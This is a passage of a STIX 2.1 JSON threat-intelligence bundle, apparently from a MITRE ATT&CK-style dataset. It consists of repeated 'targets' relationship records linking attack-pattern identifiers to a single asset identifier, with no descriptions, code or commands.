"x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c5ec952-1aa2-4e07-85c4-d4987f5eae28", "created": "2024-07-01T10:37:15.822564", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822566", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--34440326-24b7-4cb1-803e-c2e2913579ba", "created": "2024-07-01T10:37:15.822574", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822576", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef951df3-1f3b-4a33-8908-a68997f00621", "created": "2024-07-01T10:37:15.822584", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822586", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb53fe18-c9e7-462d-aa8f-242f2664df99", "created": "2024-07-01T10:37:15.822594", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822596", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--089bf3ae-2ab8-40c6-95dd-b275738e2f09", "created": "2024-07-01T10:37:15.822604", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822606", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--69c48359-30b5-4d50-9ad2-c0d1155eaf90", "created": "2024-07-01T10:37:15.822614", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822616", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91ba5f50-f203-44d1-8d01-60c040fdaaa2", "created": "2024-07-01T10:37:15.822624", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822627", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b520651-a68c-48e6-afff-f069378ffdd9", "created": "2024-07-01T10:37:15.822634", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822636", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e919ad2-943b-4c23-ac28-13bcce1d0db8", "created": "2024-07-01T10:37:15.822644", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822647", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16ee6644-bed1-4b79-a6ef-a8259a4834e2", "created": "2024-07-01T10:37:15.822654", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822656", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eea3fd46-b09c-4ae9-a834-435a149cf8e5", "created": "2024-07-01T10:37:15.822664", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822666", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcbbae11-af53-4ab2-a79c-ac3d5a9250d1", "created": "2024-07-01T10:37:15.822674", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822676", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0b3103d-54c6-4a5c-87b6-41661c63bc7c", "created": "2024-07-01T10:37:15.822684", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822686", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4bfe28ef-9db4-44e3-8187-fc1cd6bfd31c", "created": "2024-07-01T10:37:15.822694", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822696", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb760c9a-dc5f-4491-b884-42ccce31fb94", "created": "2024-07-01T10:37:15.822704", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822706", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e99481a2-1a22-4332-afbe-4c77f8b1297c", "created": "2024-07-01T10:37:15.822714", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822716", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12749267-cbb8-414f-aa06-f773789e66a3", "created": "2024-07-01T10:37:15.822724", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822726", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c6f72eba-cf38-40be-a300-54267a80e3cf", "created": "2024-07-01T10:37:15.822734", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822736", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8b54798-bc46-42ec-9090-888429e4c455", "created": "2024-07-01T10:37:15.822744", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822746", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d45eb87-0ed9-4e82-a5fd-c653dc942f1f", "created": "2024-07-01T10:37:15.822754", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822756", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0728bf9b-6a29-4b8a-87cf-b7fa3cd29abc", "created": "2024-07-01T10:37:15.822764", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822767", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4609a706-9fc4-4349-a7ae-c03e1fb5b47f", "created": "2024-07-01T10:37:15.822775", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822777", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bc80036-db37-4d7f-8738-75d8c2e2ae28", "created": "2024-07-01T10:37:15.822784", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822787", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1f8ff3a1-3a0e-436e-8011-d5a0e3cb83bc", "created": "2024-07-01T10:37:15.822795", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822797", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ecd7ed0-df3c-4a29-b79c-9de2e3893c9f", "created": "2024-07-01T10:37:15.822805", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822807", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91cce678-8bbe-4f47-99d1-bc931a930883", "created": "2024-07-01T10:37:15.822814", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822817", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29db3ce5-3b03-4a6f-80bd-7e54e08c8c18", "created": "2024-07-01T10:37:15.822825", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822827", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91c19b8d-bdbd-4604-b2dc-efcfe234690b", "created": "2024-07-01T10:37:15.822835", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822837", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--687101f4-5d7b-43cd-b7a8-d20a79bcab84", "created": "2024-07-01T10:37:15.822845", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822847", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8d118ba7-1bc8-4c41-a974-4cff62a27392", "created": "2024-07-01T10:37:15.822855", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822857", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b57f6374-0429-434b-ba13-758346c38535", "created": "2024-07-01T10:37:15.822865", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822867", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccf13b64-05e0-443b-8515-1de6180b8535", "created": "2024-07-01T10:37:15.822874", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822877", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f06a2fad-3704-4fab-acce-14f9005361ca", "created": "2024-07-01T10:37:15.822884", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7fbffa34-c97c-45c3-911a-5ed564b5629d", "created": "2024-07-01T10:37:15.822894", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822896", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4552966-d4f1-4064-8406-3b943086c26f", "created": "2024-07-01T10:37:15.822904", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9127df96-c437-43b6-8fd4-b6bdc32edb5c", "created": "2024-07-01T10:37:15.822914", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822916", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66821ad9-df2f-441d-807e-c94b6e2e43df", "created": "2024-07-01T10:37:15.822924", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822926", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--325dfea6-139c-4158-b122-194bc8e1ee01", "created": "2024-07-01T10:37:15.822934", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822936", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1814d7f-d476-4e88-9a62-fee5f69511a8", "created": "2024-07-01T10:37:15.822944", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822946", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--336bc653-92a2-4f00-aa1b-d62b5679de25", "created": "2024-07-01T10:37:15.822954", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822956", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--685bcc4e-dbea-427b-ab6d-6bb1f6a3281e", "created": "2024-07-01T10:37:15.822964", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822966", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", 